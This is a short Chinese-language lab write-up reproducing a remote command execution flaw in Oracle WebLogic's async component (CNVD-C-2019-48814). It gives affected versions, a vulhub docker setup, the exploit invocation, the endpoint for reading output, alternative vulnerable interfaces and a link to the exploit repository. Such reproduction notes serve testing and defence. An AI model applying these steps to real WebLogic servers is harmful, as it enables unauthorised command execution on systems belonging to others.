影响范围

Oracle WebLogic Server10.3.6.0.0
Oracle WebLogic Server12.1.3.0.0
Oracle WebLogic Server12.2.1.1.0
Oracle WebLogic Server12.2.1.2.0

复现过程

1.部署weblogic环境

docker pull vulhub/weblogic
docker run -dit -p 7001:7001 vulhub/weblogic



2.执行命令操作

1.执行命令注入

python3 rce.py http://127.0.0.1:7001/ "whoami"


2.获取内容

curl -i http://127.0.0.1:7001/_async/favicon.ico



3.后话

如果默认的EXP无法使用,可以尝试如下的接口:
AsyncResponseServiceHttps
AsyncResponseService
AsyncResponseServiceJms


4.EXP和参考链接

https://github.com/jas502n/CNVD-C-2019-48814

https://b1ue.cn/archives/127.html?from=groupmessage&isappinstalled=0